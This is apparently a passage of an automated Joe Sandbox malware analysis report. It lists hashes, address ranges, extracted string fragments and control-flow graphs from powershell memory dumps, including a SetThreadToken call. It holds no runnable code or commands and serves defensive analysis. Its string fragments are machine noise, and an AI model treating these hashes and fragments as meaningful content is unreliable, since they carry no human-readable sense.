                                                                                                                                                                            • Instruction ID: 46ab8de697d15325ce246e94a24fc4b64ca30592be5a3409c1fb6799c263d392
                                                                                                                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                            • Instruction Fuzzy Hash: CFE08631B00018978B089599D4504E9F7A9EBCC224F04857ED90AE7740DA72A91686E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 715f3382cab15b55a582563f2908382c8218a899ccfe67732719746a6d459e8f
                                                                                                                                                                            • Instruction ID: 6b5d731fd7ea925b5dd6ff62c823c9965cf98f8cecc65cd076b912da676d3eda
                                                                                                                                                                            • Opcode Fuzzy Hash: 715f3382cab15b55a582563f2908382c8218a899ccfe67732719746a6d459e8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE06D319493898FCB02DB7CE50A8AA7F71DB07224B0402AED5869B313D5701842CF81
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                            • Instruction ID: c515eac06b7216618b1899066797ebfc3a129f1d882459d1c706916c72891ce4
                                                                                                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 33D067B4D0420D9F8780EFADC94156EFBF4EB48204F6085AE8A19E7341F7329A129BD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9d2025db3ca7d7781c49a2c136fabcb86717d14e453b9fabfd8bdae28c7705d2
                                                                                                                                                                            • Instruction ID: 401f5003b2faf3cde8c5cd2d3001f75613e150e0477a0409b834d4642154fbc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d2025db3ca7d7781c49a2c136fabcb86717d14e453b9fabfd8bdae28c7705d2
                                                                                                                                                                            • Instruction Fuzzy Hash: B6D01234A0420DCB8704EF64E54A46E7FB5E745315F00416ED90993342DA306881CFC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5b6aad39fee2268d89404c6aa0f6fddad58449c12a0a440273c3988b67c1398
                                                                                                                                                                            • Instruction ID: a33aed3c4589d1b64c1747bc0893d96f29de408a6f787b2a614a68494bceddcc
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b6aad39fee2268d89404c6aa0f6fddad58449c12a0a440273c3988b67c1398
                                                                                                                                                                            • Instruction Fuzzy Hash: 8ED0673190510DCBCB08ABA4F95E4BDBB34FA15316F40416ED91792592EA316A9ACAC1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 83f1d3a15634723fef65cb54612dcdd7b923dceadf323305e9e26de21b458e53
                                                                                                                                                                            • Instruction ID: 2ee652acaaa8a47950c979c60b81a508f51e8ed7fd732d721bdee14d9799e1bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 83f1d3a15634723fef65cb54612dcdd7b923dceadf323305e9e26de21b458e53
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D0A93200F3C65FC3071B76A810400BFBA6E4362034604DFE18D8A6A3CA2ED884CB02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e0fbdf4b9036a5eb5116f67fc68eb42aa920a1a28080d5ef538dbd0e931b1db6
                                                                                                                                                                            • Instruction ID: 39b8e26a547d5a37dd29b169d649f843894c14c41ca7443f0f763eeebf53184e
                                                                                                                                                                            • Opcode Fuzzy Hash: e0fbdf4b9036a5eb5116f67fc68eb42aa920a1a28080d5ef538dbd0e931b1db6
                                                                                                                                                                            • Instruction Fuzzy Hash: C0C04C1140B3D15ADF47863559D4513BF715E43A3131A4AD6D051CF467CC18C44DD711
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6cdaf0352e436156fb156629411aa5ef532384bc5d091cdf9b729976376ef812
                                                                                                                                                                            • Instruction ID: 47d286947a73f9f6e7abfd05d6804ea14df27b5f07350e06c28989e31941adab
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdaf0352e436156fb156629411aa5ef532384bc5d091cdf9b729976376ef812
                                                                                                                                                                            • Instruction Fuzzy Hash: 33B0923204570A8FC2096FB5E40881473A9BA4420938108A8E50E0A296CE76E881CE45
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2306644927
                                                                                                                                                                            • Opcode ID: 860c9b0dc5d5b650e30039375bf932e9b46948ff9e3e0598618f933cf03a76ff
                                                                                                                                                                            • Instruction ID: 309b6bab377c5a3658a0dc694dd384c558b9c13eed2e3dc4041f5118bc1f1303
                                                                                                                                                                            • Opcode Fuzzy Hash: 860c9b0dc5d5b650e30039375bf932e9b46948ff9e3e0598618f933cf03a76ff
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C619FB0A1020EDBDBADAE64C544BA9B7F1AB47301F54825AE8029B390C775DDC7CB61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3865595929
                                                                                                                                                                            • Opcode ID: f9bbf5a3a5078e3ed2dd0ff8f1ce65f8c6473ed2c6e51345305ab83e72e214b0
                                                                                                                                                                            • Instruction ID: c9271b6e732ce3b89ceeddf70e149bf1f0708c43581962ded4dd45060b3377fe
                                                                                                                                                                            • Opcode Fuzzy Hash: f9bbf5a3a5078e3ed2dd0ff8f1ce65f8c6473ed2c6e51345305ab83e72e214b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 01B148B17043459FCB55AB7A980066EBBE6AFC6A10F14816AD446CF352DE32CC86C761
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-4154621813
                                                                                                                                                                            • Opcode ID: 5ca61bb40982513acfe7feb971e58b23f11288ec9601be565eea93049ec570f2
                                                                                                                                                                            • Instruction ID: 9e7a561994730468d69ded69596662b51bdadde6e37eab7a345ae8ba181fe93f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ca61bb40982513acfe7feb971e58b23f11288ec9601be565eea93049ec570f2
                                                                                                                                                                            • Instruction Fuzzy Hash: F5514F303940588FC729AB7DD55493C3AD7AB8865431009EEE516CF7B5EE26EC828752
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-1375766648
                                                                                                                                                                            • Opcode ID: 26f8d540d266e437a44c3bb01f60a85f4af641f8530cb10b4eaafda75d01c144
                                                                                                                                                                            • Instruction ID: 24474f1b3a44f1b07150411a0889a460a7c2384755ba3deb6e6ddc5e33497143
                                                                                                                                                                            • Opcode Fuzzy Hash: 26f8d540d266e437a44c3bb01f60a85f4af641f8530cb10b4eaafda75d01c144
                                                                                                                                                                            • Instruction Fuzzy Hash: E7E1F1307401148FEB19AB7D951462E76D7AFC8B54B2449AEDB02CF3E4EE35EC428792
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$pipj$tP^q$tP^q
                                                                                                                                                                            • API String ID: 0-499639324
                                                                                                                                                                            • Opcode ID: a71f6a593a393d5230baafd39077845b6ec05b60d074ab71f478c6ee3d9cf940
                                                                                                                                                                            • Instruction ID: 147a421a8df9e094ab156f7d4197d9d9cf33bd0e106c674b327ce1e16e9730fc
                                                                                                                                                                            • Opcode Fuzzy Hash: a71f6a593a393d5230baafd39077845b6ec05b60d074ab71f478c6ee3d9cf940
                                                                                                                                                                            • Instruction Fuzzy Hash: 42D149B1B0420A8FCB69AB789404666BBF6AFC6310F18857FC556CB355DB31C887C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3272787073
                                                                                                                                                                            • Opcode ID: b6d9b01b0806688677416c29b667c2da1b2ad5a4b1a3f4bfc6d8de5fb09c825a
                                                                                                                                                                            • Instruction ID: c927829a65f5389b5bc5064fbedc62460d139db9cdd9f012cd71e00e03ef45cf
                                                                                                                                                                            • Opcode Fuzzy Hash: b6d9b01b0806688677416c29b667c2da1b2ad5a4b1a3f4bfc6d8de5fb09c825a
                                                                                                                                                                            • Instruction Fuzzy Hash: 625158F17043069FDB646A7A980076EBBA6AFC2B10F24857AD447CB351DF35C886C791
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: f5fc15aa3ea625ac264429b0f6e30c44eb5bc224cec24bd9ded1e4e790e97016
                                                                                                                                                                            • Instruction ID: 76dcf0739185dce51122492550091d4c4c4d2357722f801b0f20475e04375922
                                                                                                                                                                            • Opcode Fuzzy Hash: f5fc15aa3ea625ac264429b0f6e30c44eb5bc224cec24bd9ded1e4e790e97016
                                                                                                                                                                            • Instruction Fuzzy Hash: BAB19274E0120A9FDB54DFA9D980A9DFBF2FF88304F10862AD519AB315DB34A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: f0ff4e20107cbe924737e7c15aa94adfe4196ec55238ab151fde60a993805db8
                                                                                                                                                                            • Instruction ID: a3dd3c2b1d68a4b1ad40eb02a10e178215764a7142262b89fb192d58a3aab323
                                                                                                                                                                            • Opcode Fuzzy Hash: f0ff4e20107cbe924737e7c15aa94adfe4196ec55238ab151fde60a993805db8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9CB17374E0120A9FDB54DFA9D980A9DFBF2FF88304F108629D519AB315DB34A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                                            • Opcode ID: fcec980b3e5d81b9a068e364505737ad581e70906da740f6356c4bce9f149319
                                                                                                                                                                            • Instruction ID: b574c9bdd650449fdb3d89c25fb0c6609d08fbf641c2f6b14ffc4f9f3fac81d2
                                                                                                                                                                            • Opcode Fuzzy Hash: fcec980b3e5d81b9a068e364505737ad581e70906da740f6356c4bce9f149319
                                                                                                                                                                            • Instruction Fuzzy Hash: EB216BF17103169BDBB8763A9800B27A7DB6BD0711F24852BE507CF386DD75C8518361
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2049395529
                                                                                                                                                                            • Opcode ID: faa40095720892e078b9b74ec5a804ceba60f15cc30a15d96d1173d0c05154de
                                                                                                                                                                            • Instruction ID: 3fd915e50a5fc39ff552ef609bf133db08a46914309cbe48419b9a3f771db726
                                                                                                                                                                            • Opcode Fuzzy Hash: faa40095720892e078b9b74ec5a804ceba60f15cc30a15d96d1173d0c05154de
                                                                                                                                                                            • Instruction Fuzzy Hash: 0901DB617493875FC76E163898105666FB25FC391071949ABC041CF796CD554C4E83A3

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:4.7%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                                            execution_graph 23338 8d47600 23339 8d47604 SetThreadToken 23338->23339 23341 8d47671 23339->23341

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 727 517b569-517b572 728 517b574-517b57b 727->728 729 517b57c-517b591 727->729 728->729 730 517b596-517b8d1 call 517aa7c 729->730 731 517b593 729->731 792 517b8d6-517b8dd 730->792 731->730
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 34166e7473c5238e9b6cb157332b6e94fa5f14140ce0585e8983c5d78959624a
                                                                                                                                                                            • Instruction ID: ddb7de9b980b1ef2e068f96a505ae85bf38b24c8c47cd913665bd44072479124
                                                                                                                                                                            • Opcode Fuzzy Hash: 34166e7473c5238e9b6cb157332b6e94fa5f14140ce0585e8983c5d78959624a
                                                                                                                                                                            • Instruction Fuzzy Hash: DF918371B007189BDB19EFB4D4545AEBBB2EFC4604B408D2DD10AAB344DF785D0A8BD6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 793 517b578-517b591 795 517b596-517b8d1 call 517aa7c 793->795 796 517b593 793->796 857 517b8d6-517b8dd 795->857 796->795
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ac6c4860e6b55a0e0cc01c14e6f5e03b922254e6f4341ab31415c04b9e8e8d24
                                                                                                                                                                            • Instruction ID: 43e536e16a37a9d00943b0b420a3be00649e21b063f6bfa3865555fee3ceb314
                                                                                                                                                                            • Opcode Fuzzy Hash: ac6c4860e6b55a0e0cc01c14e6f5e03b922254e6f4341ab31415c04b9e8e8d24
                                                                                                                                                                            • Instruction Fuzzy Hash: 95917071B006189BDB19EFB4D8545AEB7B2EF84604B40892DD10AAB344DF786D0A8BD6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$|,rj
                                                                                                                                                                            • API String ID: 0-1806894991
                                                                                                                                                                            • Opcode ID: b6ea117c82ab546e772826b4b8679f8150f4298cb76116fbbb75dda93b6663f6
                                                                                                                                                                            • Instruction ID: 2d7ba80751e8da86c6ab7b22153acc7cb00a65622345b8061b3cebd210c200bf
                                                                                                                                                                            • Opcode Fuzzy Hash: b6ea117c82ab546e772826b4b8679f8150f4298cb76116fbbb75dda93b6663f6
                                                                                                                                                                            • Instruction Fuzzy Hash: 992237F1B002059FFB249B6994486EABBE2FF85310F0480FAD605CB251DB39DD85C7A2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 203 7b63ce8-7b63d0d 204 7b63d13-7b63d18 203->204 205 7b63f00-7b63f4a 203->205 206 7b63d30-7b63d34 204->206 207 7b63d1a-7b63d20 204->207 213 7b63f50-7b63f55 205->213 214 7b640ce-7b64112 205->214 211 7b63eb0-7b63eba 206->211 212 7b63d3a-7b63d3c 206->212 209 7b63d24-7b63d2e 207->209 210 7b63d22 207->210 209->206 210->206 215 7b63ebc-7b63ec5 211->215 216 7b63ec8-7b63ece 211->216 217 7b63d3e-7b63d4a 212->217 218 7b63d4c 212->218 219 7b63f57-7b63f5d 213->219 220 7b63f6d-7b63f71 213->220 232 7b64228-7b6425d 214->232 233 7b64118-7b6411d 214->233 221 7b63ed4-7b63ee0 216->221 222 7b63ed0-7b63ed2 216->222 224 7b63d4e-7b63d50 217->224 218->224 225 7b63f61-7b63f6b 219->225 226 7b63f5f 219->226 229 7b63f77-7b63f79 220->229 230 7b64080-7b6408a 220->230 228 7b63ee2-7b63efd 221->228 222->228 224->211 231 7b63d56-7b63d75 224->231 225->220 226->220 235 7b63f7b-7b63f87 229->235 236 7b63f89 229->236 237 7b64097-7b6409d 230->237 238 7b6408c-7b64094 230->238 265 7b63d77-7b63d83 231->265 266 7b63d85 231->266 257 7b6425f-7b64281 232->257 258 7b6428b-7b64295 232->258 241 7b64135-7b64139 233->241 242 7b6411f-7b64125 233->242 243 7b63f8b-7b63f8d 235->243 236->243 244 7b640a3-7b640af 237->244 245 7b6409f-7b640a1 237->245 250 7b6413f-7b64141 241->250 251 7b641da-7b641e4 241->251 252 7b64127 242->252 253 7b64129-7b64133 242->253 243->230 247 7b63f93-7b63fb2 243->247 248 7b640b1-7b640cb 244->248 245->248 286 7b63fb4-7b63fc0 247->286 287 7b63fc2 247->287 259 7b64143-7b6414f 250->259 260 7b64151 250->260 261 7b641e6-7b641ee 251->261 262 7b641f1-7b641f7 251->262 252->241 253->241 299 7b642d5-7b642fe 257->299 300 7b64283-7b64288 257->300 271 7b64297-7b6429c 258->271 272 7b6429f-7b642a5 258->272 267 7b64153-7b64155 259->267 260->267 269 7b641fd-7b64209 262->269 270 7b641f9-7b641fb 262->270 273 7b63d87-7b63d89 265->273 266->273 267->251 275 7b6415b-7b6415d 267->275 276 7b6420b-7b64225 269->276 270->276 277 7b642a7-7b642a9 272->277 278 7b642ab-7b642b7 272->278 273->211 280 7b63d8f-7b63d96 273->280 281 7b64177-7b6417e 275->281 282 7b6415f-7b64165 275->282 285 7b642b9-7b642d2 277->285 278->285 280->205 289 7b63d9c-7b63da1 280->289 292 7b64196-7b641d7 281->292 293 7b64180-7b64186 281->293 290 7b64167 282->290 291 7b64169-7b64175 282->291 298 7b63fc4-7b63fc6 286->298 287->298 301 7b63da3-7b63da9 289->301 302 7b63db9-7b63dc8 289->302 290->281 291->281 303 7b6418a-7b64194 293->303 304 7b64188 293->304 298->230 305 7b63fcc-7b64003 298->305 319 7b64300-7b64326 299->319 320 7b6432d-7b6435c 299->320 306 7b63dad-7b63db7 301->306 307 7b63dab 301->307 302->211 314 7b63dce-7b63dec 302->314 303->292 304->292 329 7b64005-7b6400b 305->329 330 7b6401d-7b64024 305->330 306->302 307->302 314->211 328 7b63df2-7b63e17 314->328 319->320 326 7b64395-7b6439f 320->326 327 7b6435e-7b6437b 320->327 335 7b643a1-7b643a5 326->335 336 7b643a8-7b643ae 326->336 346 7b643e5-7b643ea 327->346 347 7b6437d-7b6438f 327->347 328->211 354 7b63e1d-7b63e24 328->354 331 7b6400f-7b6401b 329->331 332 7b6400d 329->332 333 7b64026-7b6402c 330->333 334 7b6403c-7b6407d 330->334 331->330 332->330 338 7b64030-7b6403a 333->338 339 7b6402e 333->339 343 7b643b4-7b643c0 336->343 344 7b643b0-7b643b2 336->344 338->334 339->334 348 7b643c2-7b643e2 343->348 344->348 346->347 347->326 355 7b63e26-7b63e41 354->355 356 7b63e6a-7b63e9d 354->356 360 7b63e43-7b63e49 355->360 361 7b63e5b-7b63e5f 355->361 367 7b63ea4-7b63ead 356->367 362 7b63e4d-7b63e59 360->362 363 7b63e4b 360->363 365 7b63e66-7b63e68 361->365 362->361 363->361 365->367
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                                            • Opcode ID: 24ee357022c0c98601514023d893bc943fd0b6ae4a3ec905069ef5f0b42cb7e1
                                                                                                                                                                            • Instruction ID: 3e2571ef9d0545e23eaf3852dd64389671510d45a4aa1fcecfe1f3a270aee7b2
                                                                                                                                                                            • Opcode Fuzzy Hash: 24ee357022c0c98601514023d893bc943fd0b6ae4a3ec905069ef5f0b42cb7e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 131237F1B043558FDB159B68980876ABFE2EF81210F2480BAD645CF256DE3ACD85C7A1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 491 8d475f9-8d475fa 492 8d47604-8d47606 491->492 493 8d475fc-8d475fe 491->493 495 8d47608-8d4763b 492->495 494 8d47600-8d47603 493->494 493->495 494->492 496 8d47643-8d4766f SetThreadToken 495->496 497 8d47671-8d47677 496->497 498 8d47678-8d47695 496->498 497->498
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2473147230.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_8d40000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3254676861-0
                                                                                                                                                                            • Opcode ID: 9fae3203bbb4cedd15616dd14e9dc2c9a75355924681e61a0bbb9fda2684c3ea
                                                                                                                                                                            • Instruction ID: b0c7647f5bff6a2462f4da955d75b1f7cb53e2a0003837558e0fbb4506496eda
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fae3203bbb4cedd15616dd14e9dc2c9a75355924681e61a0bbb9fda2684c3ea
                                                                                                                                                                            • Instruction Fuzzy Hash: 211164B19002888FCB10CF9EC488A9EFFF5EB49360F208859D158A7310C774A945CFA4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 501 8d47600-8d4766f SetThreadToken 505 8d47671-8d47677 501->505 506 8d47678-8d47695 501->506 505->506
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2473147230.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
